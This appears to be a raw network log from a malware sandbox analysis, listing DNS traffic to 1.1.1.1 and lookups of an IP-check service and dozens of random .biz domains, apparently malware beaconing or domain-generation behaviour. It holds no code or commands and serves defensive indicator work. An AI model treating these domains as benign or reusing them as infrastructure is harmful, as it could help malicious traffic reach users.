                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.090101004 CET5161753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.097012997 CET53516171.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.950757980 CET6266753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:06.958441973 CET53626671.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.633313894 CET5198053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:07.640697002 CET53519801.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.041965961 CET5822753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.050741911 CET53582271.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.051306963 CET5716553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.058545113 CET53571651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.083432913 CET5716553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:09.090626955 CET53571651.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.619079113 CET5826653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.626684904 CET53582661.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.627181053 CET5272753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.635644913 CET53527271.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.636077881 CET6438953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 10:00:10.644619942 CET53643891.1.1.1192.168.2.7

                                                                                                                                                                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:12.195199013 CET192.168.2.71.1.1.10x9fceStandard query (0)gxe0.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:49.977210045 CET192.168.2.71.1.1.10x3aaaStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.644660950 CET192.168.2.71.1.1.10x1300Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:51.656702995 CET192.168.2.71.1.1.10x7aefStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:52.409692049 CET192.168.2.71.1.1.10x78cStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:53.164984941 CET192.168.2.71.1.1.10xbeb5Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.024616003 CET192.168.2.71.1.1.10x75d6Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.521652937 CET192.168.2.71.1.1.10x666dStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.359428883 CET192.168.2.71.1.1.10x72aeStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.070612907 CET192.168.2.71.1.1.10xd5dbStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.044814110 CET192.168.2.71.1.1.10x5f52Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.079418898 CET192.168.2.71.1.1.10x49a3Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.234710932 CET192.168.2.71.1.1.10xa385Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.413628101 CET192.168.2.71.1.1.10xbe0eStandard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.704310894 CET192.168.2.71.1.1.10x1350Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.843842983 CET192.168.2.71.1.1.10xe226Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.851702929 CET192.168.2.71.1.1.10xed65Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.861418009 CET192.168.2.71.1.1.10x4c37Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.003287077 CET192.168.2.71.1.1.10x4cffStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.012200117 CET192.168.2.71.1.1.10x5665Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.514348030 CET192.168.2.71.1.1.10x5e36Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.537094116 CET192.168.2.71.1.1.10x6ab1Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:03.545635939 CET192.168.2.71.1.1.10xfda4Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:06.342679024 CET192.168.2.71.1.1.10xe04eStandard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:20.037214041 CET192.168.2.71.1.1.10xa8b5Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.515090942 CET192.168.2.71.1.1.10x9eafStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:21.544591904 CET192.168.2.71.1.1.10xaf26Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:23.163593054 CET192.168.2.71.1.1.10x7ba2Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:25.177212000 CET192.168.2.71.1.1.10xc01aStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:26.026163101 CET192.168.2.71.1.1.10xaf0Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:27.525762081 CET192.168.2.71.1.1.10x36deStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:28.401807070 CET192.168.2.71.1.1.10x2f98Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:29.842891932 CET192.168.2.71.1.1.10x6b73Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.214260101 CET192.168.2.71.1.1.10x7bd8Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.231493950 CET192.168.2.71.1.1.10x5504Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:31.747332096 CET192.168.2.71.1.1.10x4e59Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.033528090 CET192.168.2.71.1.1.10x795bStandard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.041539907 CET192.168.2.71.1.1.10x63daStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.049719095 CET192.168.2.71.1.1.10x2103Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:33.538203001 CET192.168.2.71.1.1.10x6f18Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:35.307002068 CET192.168.2.71.1.1.10xda58Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:36.168425083 CET192.168.2.71.1.1.10x7ce3Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:37.826172113 CET192.168.2.71.1.1.10x1daeStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:39.575613022 CET192.168.2.71.1.1.10x84a2Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:40.837444067 CET192.168.2.71.1.1.10x39fdStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:42.408471107 CET192.168.2.71.1.1.10xac9Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:43.627800941 CET192.168.2.71.1.1.10x8884Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:45.265758038 CET192.168.2.71.1.1.10x968cStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:46.185914993 CET192.168.2.71.1.1.10x5cb7Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:47.207046986 CET192.168.2.71.1.1.10x32a5Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:48.512634039 CET192.168.2.71.1.1.10xf755Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:49.387227058 CET192.168.2.71.1.1.10xfd74Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.051191092 CET192.168.2.71.1.1.10xfdc3Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:50.872971058 CET192.168.2.71.1.1.10xb9a2Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:51.887140989 CET192.168.2.71.1.1.10x448bStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:53.000797987 CET192.168.2.71.1.1.10x2c8dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:54.877201080 CET192.168.2.71.1.1.10xc556Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:56.152791023 CET192.168.2.71.1.1.10x5bc5Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:58.383336067 CET192.168.2.71.1.1.10x8a91Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:59.460771084 CET192.168.2.71.1.1.10x92ccStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:00.412425041 CET192.168.2.71.1.1.10xd97eStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.101104975 CET192.168.2.71.1.1.10x66d4Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:02.109232903 CET192.168.2.71.1.1.10xa1d1Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:03.219620943 CET192.168.2.71.1.1.10x6d0eStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:04.119179964 CET192.168.2.71.1.1.10x87e5Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:05.774971962 CET192.168.2.71.1.1.10x42e0Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.049647093 CET192.168.2.71.1.1.10x354Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:07.504407883 CET192.168.2.71.1.1.10x3597Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.569612980 CET192.168.2.71.1.1.10x9824Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:08.585613966 CET192.168.2.71.1.1.10x33a8Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.062659025 CET192.168.2.71.1.1.10xf3eStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.425374031 CET192.168.2.71.1.1.10x74deStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:10.903654099 CET192.168.2.71.1.1.10x14b3Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.478897095 CET192.168.2.71.1.1.10x7cadStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:12.595942974 CET192.168.2.71.1.1.10x6a45Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:13.851342916 CET192.168.2.71.1.1.10x8c3bStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.014448881 CET192.168.2.71.1.1.10x331fStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.827534914 CET192.168.2.71.1.1.10x3a4fStandard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:14.843076944 CET192.168.2.71.1.1.10x3607Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:15.581321001 CET192.168.2.71.1.1.10xe211Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.043354034 CET192.168.2.71.1.1.10x3e30Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:16.385135889 CET192.168.2.71.1.1.10x5e72Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.154613972 CET192.168.2.71.1.1.10x3ec0Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:17.838269949 CET192.168.2.71.1.1.10x3af1Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.529572010 CET192.168.2.71.1.1.10xfde3Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:18.729672909 CET192.168.2.71.1.1.10x9366Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:19.402751923 CET192.168.2.71.1.1.10x7a25Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.269606113 CET192.168.2.71.1.1.10x5042Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:20.448548079 CET192.168.2.71.1.1.10xe9d9Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.277753115 CET192.168.2.71.1.1.10x5042Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:21.596405029 CET192.168.2.71.1.1.10x3fe9Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:22.638175964 CET192.168.2.71.1.1.10xde67Standard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.528462887 CET192.168.2.71.1.1.10x1c66Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:23.550672054 CET192.168.2.71.1.1.10xe84bStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.387950897 CET192.168.2.71.1.1.10xf8e5Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.695293903 CET192.168.2.71.1.1.10x3997Standard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.804325104 CET192.168.2.71.1.1.10xe79fStandard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:24.812136889 CET192.168.2.71.1.1.10x451cStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:25.544473886 CET192.168.2.71.1.1.10x1eb6Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:26.417037964 CET192.168.2.71.1.1.10x3727Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.159039021 CET192.168.2.71.1.1.10x2a60Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:27.891793013 CET192.168.2.71.1.1.10x28c5Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.590022087 CET192.168.2.71.1.1.10x4373Standard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:28.754086018 CET192.168.2.71.1.1.10xe2acStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:29.278327942 CET192.168.2.71.1.1.10x3bc8Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.543776989 CET192.168.2.71.1.1.10x94d4Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.780848980 CET192.168.2.71.1.1.10x4407Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:30.788794994 CET192.168.2.71.1.1.10xebd1Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:31.636745930 CET192.168.2.71.1.1.10x4a3dStandard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.301737070 CET192.168.2.71.1.1.10x998Standard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:32.325567007 CET192.168.2.71.1.1.10xb230Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.445179939 CET192.168.2.71.1.1.10x3e0fStandard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:33.829890966 CET192.168.2.71.1.1.10x7c97Standard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:34.519851923 CET192.168.2.71.1.1.10x6f74Standard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.286789894 CET192.168.2.71.1.1.10x5191Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:35.472955942 CET192.168.2.71.1.1.10xf2f8Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:36.179816008 CET192.168.2.71.1.1.10xcb68Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.150513887 CET192.168.2.71.1.1.10x8ebeStandard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:37.850018024 CET192.168.2.71.1.1.10x74fStandard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.336227894 CET192.168.2.71.1.1.10x8ce0Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:39.412381887 CET192.168.2.71.1.1.10x553dStandard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:40.284363985 CET192.168.2.71.1.1.10x7f6dStandard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.070714951 CET192.168.2.71.1.1.10xfde7Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.261435986 CET192.168.2.71.1.1.10xf70eStandard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.933248997 CET192.168.2.71.1.1.10xa39aStandard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.591089010 CET192.168.2.71.1.1.10xefcaStandard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.024494886 CET192.168.2.71.1.1.10x8795Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.190304041 CET192.168.2.71.1.1.10x4d43Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.561949015 CET192.168.2.71.1.1.10xb871Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.476043940 CET192.168.2.71.1.1.10x78cfStandard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.686445951 CET192.168.2.71.1.1.10xf224Standard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.549803019 CET192.168.2.71.1.1.10xd0f3Standard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.940319061 CET192.168.2.71.1.1.10x5ab1Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.060358047 CET192.168.2.71.1.1.10x8c7fStandard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.747281075 CET192.168.2.71.1.1.10xa6a5Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.758282900 CET192.168.2.71.1.1.10x2f85Standard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:48.895025015 CET192.168.2.71.1.1.10xa725Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.211502075 CET192.168.2.71.1.1.10x46fbStandard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:50.214298964 CET192.168.2.71.1.1.10x5714Standard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:51.195645094 CET192.168.2.71.1.1.10xe9dfStandard query (0)warkcdu.bizA (IP address)IN (0x0001)false
